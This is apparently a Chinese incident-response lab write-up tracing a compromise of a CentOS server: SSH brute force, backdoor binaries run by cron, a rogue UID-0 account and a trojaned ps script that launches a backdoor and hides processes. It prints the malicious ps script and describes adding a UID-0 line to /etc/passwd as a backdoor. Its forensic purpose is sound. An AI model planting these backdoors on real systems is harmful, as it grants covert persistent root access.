任务14 应急响应案例4
下载链接 https://pan.baidu.com/s/1Upr1e4ZagIY0CGzbZ73bbg?pwdsqjd1.事件背景某日一位客户发来反馈服务器似乎遭到入侵正在与一个恶意 IP代号192.168.226.131进行通信。受影响的服务器运行着 CentOS 操作系统IP地址为 192.168.226.132但未部署任何 WEB 服务。用户名密码root root2. 应急响应过程2.1 排查网络连接在检查服务器的网络连接时我发现了一个异常现象服务器 192.168.226.132 不断地与恶意 IP 地址 192.168.226.131 的 3512 端口建立连接并且这些连接的程序名被标识为 shell.elf其 PID 号分别是 3424和 12874。这一情况让我意识到可能存在严重的安全问题需要立即采取行动来应对这一威胁.netstat -anpt在观察异常通信时我注意到这些连接状态为 SYN_SENT而且隔一段时间就会重新发起连接而且每次连接的进程 PID 号都不相同。这种现象表明恶意 IP 地址192.168.226.131的行为异常可能在尝试进行入侵或者进行其他恶意活动我根据 PID 号查找到了对应程序的位置发现它位于 /root/shell.elf。这个发现让我更加警觉因为该程序不仅与异常的恶意 IP 地址建立了连接而且其位置在根目录下这可能意味着它具有潜在的危险性。需要立即对此程序进行深入分析和处理以确保服务器的安全。lsof -p 3430lsof -p 3512通过查看我发现 shell.elf 文件的创建时间是在 2022 年 1 月 14 日的 00:51:12。这个发现让我更加担忧因为这意味着这个恶意程序已经存在了一段时间可能已经在服务器上潜伏了一段时间。现在更加迫切需要采取行动阻止其进一步的恶意活动并确保服务器的安全。stat shell.elf进一步的分析表明经过将 shell.elf 文件提交到微步在线检测平台检测后结果显示该文件确实是一个后门文件。这个发现再次强调了安全威胁的严重性因为后门文件可能允许攻击者远程控制服务器执行恶意操作或窃取敏感信息。2.2 历史命令排查我立即检查服务器的日志以查看是否有任何可疑的命令被黑客执行。通过分析日志记录我能够追踪到任何可能的恶意活动或非授权访问并且采取适当的措施来应对这些威胁。History发现历史命令已经都被黑客清空2.3 排查后门账户要查看当前登录系统的用户可以使用 who 命令或 w 命令。这些命令将显示当前登录到系统的用户及其相关信息。执行这些命令后系统将显示当前登录到系统的用户列表包括用户名、登录时间、登录来源等信息。没有发现异常。查看特权账户awk -F: $30 {print$1} /etc/passwd# /etc/passwd 条目完整解析 样例 root:x:0:0:root:/root:/bin/bash 整条以**冒号 :** 分隔一共7个字段格式统一 用户名:密码占位符:UID:GID:注释信息:家目录:登录Shell ## 字段逐一拆解 ### 1. 第1段root 登录用户名系统登录标识。 ### 2. 第2段x 密码占位符 - x用户加密密码**不在passwd**存放于 /etc/shadow现代Linux默认shadow严格权限仅root可读 - 为空无密码可直接免密登录 - 特殊字符早期系统直接存放加密密码现已废弃不安全。 ### 3. 第3段0UID 用户ID - UID0**超级管理员root**系统唯一最高权限 - 1~999系统内置服务账号nginx、mysql等禁止登录 - ≥1000普通新建用户。 ### 4. 第4段0GID 组ID 对应 /etc/group 内的用户初始用户组IDroot默认归属root组。 ### 5. 第5段root注释/备注 个人说明、全名可自定义一般写用户名、描述空着也合法。 ### 6. 第6段/root家目录 用户登录后默认所在文件夹 - root专属家目录 /root - 普通用户一般为 /home/用户名。 ### 7. 第7段/bin/bash登录Shell 用户登录后使用的命令解释器 1. /bin/bash可正常交互式登录 2. /sbin/nologin禁止SSH/终端登录多用于服务账号 3. /bin/false强制拒绝登录 4. /sbin/shutdown登录即关机特殊用途。 ## 延伸知识点安全渗透常用 1. **提权后门手法** 手动新增一行 test:x:0:0::/root:/bin/bashUID0 实现伪root账号拥有最高权限。 2. **账号排查** 排查异常UID0的陌生账号排查nologin以外的可疑服务账号是入侵排查常用手段。 3. 配套文件 - /etc/passwd所有用户基础信息所有用户可读 - /etc/shadow密码哈希、过期策略仅root可读 - /etc/group用户组信息。 ## 同类示例对比 nginx:x:997:997::/home/nginx:/sbin/nologin 普通服务账号UID997不可登录仅运行服务。/etc/passwd 条目完整解析样例root:x:0:0:root:/root:/bin/bash整条以冒号:分隔一共7个字段格式统一用户名:密码占位符:UID:GID:注释信息:家目录:登录Shell字段逐一拆解第1段root登录用户名系统登录标识。第2段x密码占位符x用户加密密码不在passwd存放于/etc/shadow现代Linux默认shadow严格权限仅root可读为空无密码可直接免密登录特殊字符早期系统直接存放加密密码现已废弃不安全。第3段0UID 用户IDUID0超级管理员root系统唯一最高权限1~999系统内置服务账号nginx、mysql等禁止登录≥1000普通新建用户。第4段0GID 组ID对应/etc/group内的用户初始用户组IDroot默认归属root组。第5段root注释/备注个人说明、全名可自定义一般写用户名、描述空着也合法。第6段/root家目录用户登录后默认所在文件夹root专属家目录/root普通用户一般为/home/用户名。第7段/bin/bash登录Shell用户登录后使用的命令解释器/bin/bash可正常交互式登录/sbin/nologin禁止SSH/终端登录多用于服务账号/bin/false强制拒绝登录/sbin/shutdown登录即关机特殊用途。延伸知识点安全渗透常用提权后门手法手动新增一行test:x:0:0::/root:/bin/bashUID0 实现伪root账号拥有最高权限。账号排查排查异常UID0的陌生账号排查nologin以外的可疑服务账号是入侵排查常用手段。配套文件/etc/passwd所有用户基础信息所有用户可读/etc/shadow密码哈希、过期策略仅root可读/etc/group用户组信息。同类示例对比nginx:x:997:997::/home/nginx:/sbin/nologin普通服务账号UID997不可登录仅运行服务。经过与客户沟通后确认发现了两个特权账户root 和 wxiaoge。进一步的调查表明wxiaoge 账户是由黑客创建的这个发现非常重要因为它可能是入侵事件的一部分。查看可以远程登录的帐号信息awk /\$1|\$6/{print $1} /etc/shadowawk /\$1|\$6/{print $1} /etc/shadow又有wxiaoge确定了 wxiaoge 是黑客的后门账户接下来查看用户最近登录情况cat secure |grep Accepted grep Accepted /var/log/secure* | awk {print $1,$2,$3,$9,$11}发现 wxiaoge 账户在 1 月 14 日的 00:47:33 登录了服务器而该登录来源的 IP 地址为 192.168.226.1。2.4 排查crontab后门查看服务器的定时任务crontab -l经过调查发现root账户下存在一个定时任务它每分钟都在执行 /root/shell.elf 文件。且 shell.elf 文件已被确认为后门文件。2.5 排查是否有命令被替换继续进一步检查确认命令文件是否被替换。这项检查是为了确保被执行的命令文件没有被恶意文件所替代从而防止可能的安全威胁。rpm -Vf /usr/bin/* #S 关键字代表文件大小发生了变化 #5 关键字代表文件的 md5 值发生了变化 #T 代表文件时间发生了变化rpm -Vf /usr/bin/*#S 关键字代表文件大小发生了变化#5 关键字代表文件的 md5 值发生了变化#T 代表文件时间发生了变化查看ps命令内容cat /usr/bin/ps发现ps文件内容发现被修改了且被被修改成以下内容[root192 log]# cat /usr/bin/ps #!/bin/bash /centos_core.elf /.hide_command/ps |grep -v shell | grep -v centos_core | grep bash#!/bin/bash/centos_core.elf /.hide_command/ps |grep -v shell | grep -v centos_core | grep bash#每次执行ps命令都会执行centos_core.elf文件、.hide_command/ps文件#grep -v的意思是只打印没有匹配的而匹配的反而不打印相当于隐藏shell、centos_core、bash异常文件信息查看centos_core.elf文件创建时间为2022-01-14 00:57:03.954050367 -0500stat /centos_core.elf将 centos_core.elf 文件放在微步云沙箱检测是后门文件经过调查发现存在一个名为 ps 的命令后门。这个后门通过替换正常的 ps 命令来实现每当执行一次 ps 命令时实际上会触发执行 /centos_core.elf 后门文件。这种情况非常危险因为它允许攻击者在不被察觉的情况下执行恶意操作。2.6 总结经过调查我们确认了以下安全问题1. 发现后门文件 /root/shell.elf 和 /centos_core.elf 存在于系统中这些文件可能被黑客用于执行恶意操作。2. 账户 wxiaoge 被发现是一个后门账户可能被黑客用于入侵和执行恶意活动。3. 发现存在恶意定时任务可能被用于定期执行恶意代码或命令。4. 发现 ps 命令被替换为后门版本每次执行 ps 命令都会触发执行后门代码。这些发现表明系统存在严重的安全威胁我们必须立即采取措施来清除后门文件、禁用后门账户、删除恶意定时任务并修复被替换的 ps 命令以确保服务器的安全。清除后门文件rm -rf /root/shell.elfrm -rf /centos_core.elf将ps命令删除再将 .hide_command/ps 恢复rm -rf /usr/bin/psmv /.hide_command/ps /usr/bin/ps删除后门账户vi /etc/passwd#vi编辑额passwd文件按dd删除 wxiaoge那一行之后保存并推出3.应急响应溯源3.1 查看后门查看 shell.elf 文件的创建时间为2022-01-14 00:51:12stat shell.elf查看 定时任务 root 文件的创建时间为2022-01-14 01:05:53stat /var/spool/cron/root查看centos_core.elf文件创建时间为2022-01-14 00:57:03.954050367 -0500stat /centos_core.elf查看 ps命令文件修改时间为2022-01-14 01:03:42stat /usr/bin/ps3.2 排查安全日志查看secure日志发现爆破的时间范围是1.13 215132——215831cat /var/log/secure |grep Failedcat secure |grep Failed|head -n 5 cat secure |grep Failed|tail -n 5 cat /var/log/secure |grep Failed查看爆破的次数、攻击IP、破的用户名#查询有哪些IP在爆破命令grep Failed password /var/log/secure|grep -E -o (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|uniq -cgrep Failed password /var/log/secure|grep -E -o (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|uniq -c#查询被爆破的用户名都有哪些grep Failed password /var/log/secure|perl -e while($_){ /for(.*?) from/; print $1\n;}|uniq -c|sort -nrgrep Failed password /var/log/secure|perl -e while($_){ /for(.*?) from/; print $1\n;}|uniq -c|sort -nr接下来查看用户最近登录情况grep Accepted /var/log/secure* | awk {print $1,$2,$3,$9,$11}grep Accepted /var/log/secure* | awk {print $1,$2,$3,$9,$11}发现 root 账户在1月13 日 21:57:56 登录了该服务器在爆破的时间范围内21:51:32——21:58:31wxiaoge 账户在 1月14 日 00:47:33登录了该服务器3.3溯源总结经过调查发现黑客于 1 月 13 日的 21:51:32 到 21:58:31 期间对服务器进行了爆破行为并在 21:57:56 成功爆破出了 root 账户的密码并且成功登录到系统。在 1 月 14 日的 00:51:12黑客植入了名为 shell.elf 的后门随后在 00:57:03 植入了名为 centos_core.elf 的后门并在 01:03:42 植入了针对 ps 命令的后门。另外在 01:05:53 时黑客还写入了恶意定时任务。这些恶意行为都是由 IP 地址为 192.168.226.1 的黑客发起的。

相关新闻

Unity游戏开发模板解析:从《牛头人大师》学习3D动作游戏关卡构建

Unity游戏开发模板解析:从《牛头人大师》学习3D动作游戏关卡构建

1. 这篇文章真正要解决的问题如果你是一个独立游戏开发者,或者是一个对Unity、Godot等引擎有一定了解,正在尝试制作自己的3D动作或角色扮演游戏,那么你很可能正面临一个共同的困境:如何高效地构建一个具有吸引力的、可玩性高的游戏…

2026/8/6 12:14:52 阅读更多 →
打造你的专属Fantia数字收藏馆:告别内容过期焦虑的智能备份方案

打造你的专属Fantia数字收藏馆:告别内容过期焦虑的智能备份方案

打造你的专属Fantia数字收藏馆:告别内容过期焦虑的智能备份方案 【免费下载链接】fantiadl Download posts and media from Fantia 项目地址: https://gitcode.com/gh_mirrors/fa/fantiadl 在数字内容日益丰富的今天,Fantia作为创作者与粉丝的桥梁…

2026/8/6 12:13:52 阅读更多 →
深入解析表达式求值:双栈算法原理与实战避坑指南

深入解析表达式求值:双栈算法原理与实战避坑指南

1. 从一道经典题目说起:为什么“表达式求值”值得深挖?如果你参加过信息学竞赛,或者正在准备相关的编程考试,那么“表达式求值”这个题目对你来说一定不陌生。它几乎是数据结构与算法入门路上的一道“必修课”,从NOIP/…

2026/8/7 12:20:10 阅读更多 →

最新新闻

Node.js微信支付APIv3对接实战:wechat-node-v3库核心应用指南

Node.js微信支付APIv3对接实战:wechat-node-v3库核心应用指南

1. 从零到一:为什么选择 wechat-node-v3 库 如果你正在用 Node.js 开发一个需要接入微信支付的小程序、公众号或者 App,那么“如何对接支付”这个问题,大概率会是你项目中的一个关键节点。微信支付 APIv3 相比老旧的 v2 版本,在安…

2026/8/7 15:19:25 阅读更多 →
前端人必看:收藏!大模型VS智能体,小白也能快速入行的转型指南

前端人必看:收藏!大模型VS智能体,小白也能快速入行的转型指南

文章指出2026年以来前端就业市场面临变革,AI工具和智能体成为新风口。通过数据分析和案例说明前端岗位减少趋势,并对比大模型和智能体岗位的薪资和发展前景。建议大学生根据自身情况选择适合的AI赛道,并提供前端开发者转型路径图,…

2026/8/7 15:19:25 阅读更多 →
收藏!小白程序员轻松入门大模型,抓住AI红利期必备指南!

收藏!小白程序员轻松入门大模型,抓住AI红利期必备指南!

本文揭示了AI行业中两个常见的误解:求职者觉得AI很难学,企业觉得AI项目好做。文章强调,明确的学习目标能显著提升学习效果,尤其对于求职者。同时,AI技术虽简单,但项目却极其复杂,需要复合型人才…

2026/8/7 15:19:25 阅读更多 →
3分钟掌握Steam创意工坊下载:WorkshopDL终极使用指南

3分钟掌握Steam创意工坊下载:WorkshopDL终极使用指南

3分钟掌握Steam创意工坊下载:WorkshopDL终极使用指南 【免费下载链接】WorkshopDL WorkshopDL - The Best Steam Workshop Downloader 项目地址: https://gitcode.com/gh_mirrors/wo/WorkshopDL 你是否在Epic、GOG等平台购买了游戏,却无法访问Ste…

2026/8/7 15:19:25 阅读更多 →
终极Windows隐私保护指南:5分钟深度掌握Boss-Key老板键一键隐藏技术

终极Windows隐私保护指南:5分钟深度掌握Boss-Key老板键一键隐藏技术

终极Windows隐私保护指南:5分钟深度掌握Boss-Key老板键一键隐藏技术 【免费下载链接】Boss-Key 老板来了?快用Boss-Key老板键一键隐藏静音当前窗口!上班摸鱼必备神器 项目地址: https://gitcode.com/gh_mirrors/bo/Boss-Key 在数字隐私…

2026/8/7 15:19:25 阅读更多 →
Claude Code与Coding Plan:AI驱动的智能编程助手安装与实战指南

Claude Code与Coding Plan:AI驱动的智能编程助手安装与实战指南

1. 项目概述:为什么你需要Claude Code与Coding Plan? 如果你是一名开发者,最近可能被“Claude Code”和“Coding Plan”这两个词刷屏了。简单来说,Claude Code是一个新兴的、专注于代码生成的AI助手,而Coding Plan则是…

2026/8/7 15:18:25 阅读更多 →

日新闻

为什么scrcpy成为Android投屏的终极解决方案:完整实战指南

为什么scrcpy成为Android投屏的终极解决方案:完整实战指南

为什么scrcpy成为Android投屏的终极解决方案:完整实战指南 【免费下载链接】scrcpy Display and control your Android device 项目地址: https://gitcode.com/GitHub_Trending/sc/scrcpy 想要将Android手机屏幕完美投射到电脑上,享受大屏操作的自…

2026/8/7 0:00:19 阅读更多 →
如何在5分钟内掌握Tom Select:打造现代化表单选择器的终极指南

如何在5分钟内掌握Tom Select:打造现代化表单选择器的终极指南

如何在5分钟内掌握Tom Select:打造现代化表单选择器的终极指南 【免费下载链接】tom-select Tom Select is a lightweight (~16kb gzipped) hybrid of a textbox and select box. Forked from selectize.js to provide a framework agnostic autocomplete widget wi…

2026/8/7 0:00:19 阅读更多 →
5分钟快速上手:NSZ压缩工具终极指南,轻松管理Switch游戏文件

5分钟快速上手:NSZ压缩工具终极指南,轻松管理Switch游戏文件

5分钟快速上手:NSZ压缩工具终极指南,轻松管理Switch游戏文件 【免费下载链接】nsz NSZ - Homebrew compatible NSP/XCI compressor/decompressor 项目地址: https://gitcode.com/gh_mirrors/ns/nsz 你是否在为Nintendo Switch游戏文件占用大量存储…

2026/8/7 0:00:19 阅读更多 →

周新闻

最大流算法详解:从水管网络到Ford-Fulkerson与Dinic实战

最大流算法详解:从水管网络到Ford-Fulkerson与Dinic实战

1. 从水管网络到最大流:一个核心问题的诞生想象一下,你是一个城市供水系统的总工程师。你的城市有多个水源(水库),需要通过一个复杂的地下管道网络,将水输送到各个居民区。每条管道都有其最大通水能力&…

2026/8/6 22:02:27 阅读更多 →
基于Springboot的企业门户网站(源码+LW+调试文档+讲解)

基于Springboot的企业门户网站(源码+LW+调试文档+讲解)

温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台…

2026/8/6 22:02:27 阅读更多 →
MATLAB xcorr函数详解:从互相关原理到四大实战应用

MATLAB xcorr函数详解:从互相关原理到四大实战应用

1. 从一次信号“找茬”说起:为什么我们需要互相关几年前,我在处理一组声学传感器数据时遇到了一个棘手的问题。我有两个麦克风记录了一段相同的音频信号,理论上它们接收到的声音波形应该非常相似,只是由于麦克风位置不同&#xff…

2026/8/6 22:02:27 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/5 23:28:39 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/6 22:02:28 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/5 23:46:51 阅读更多 →